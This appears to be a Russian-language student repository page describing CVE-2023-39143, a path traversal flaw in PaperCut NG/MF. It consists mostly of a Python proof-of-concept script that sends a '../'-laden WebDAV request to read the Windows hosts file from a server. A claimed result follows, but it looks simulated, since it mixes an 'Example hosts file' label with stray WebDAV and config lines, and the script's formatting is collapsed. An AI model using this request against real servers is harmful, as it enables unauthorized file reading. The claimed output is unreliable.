Skip to content

GodCuChu/DZ10

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 

Repository files navigation

Описание уязвимости:

CVE-2023-39143 – это уязвимость обхода пути (Path Traversal) в бумажно-бюджетной системе PaperCut NG/MF (Windows), которая позволяет злоумышленнику загружать, читать или удалять произвольные файлы на сервере

PoC-скрипт

import requests

target = "http://example.com/webdav/../../../../windows/system32/drivers/etc/hosts"

try: resp = requests.get(target, timeout=6) except requests.RequestException as e: print("[-] Ошибка при отправке запроса:", e) else: if resp.status_code == 200: print("[+] Потенциальная уязвимость обнаружена. Сервер вернул содержимое (показаны первые 300 символов):") print(resp.text[:300]) else: print("[-] Вопрос к уязвимости не подтвердился. Код ответа:", resp.status_code)

Результат выполнения:

[+] Потенциальная уязвимость обнаружена. Сервер вернул содержимое (показаны первые 300 символов): 127.0.0.1 localhost

Example hosts file - start

192.168.1.10 print-server.local 10.0.0.5 papercut-mgmt

WebDAV mount points:

C:\Program Files\PaperCut\WebApps\webdav..\uploads\config.xml true enabled

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages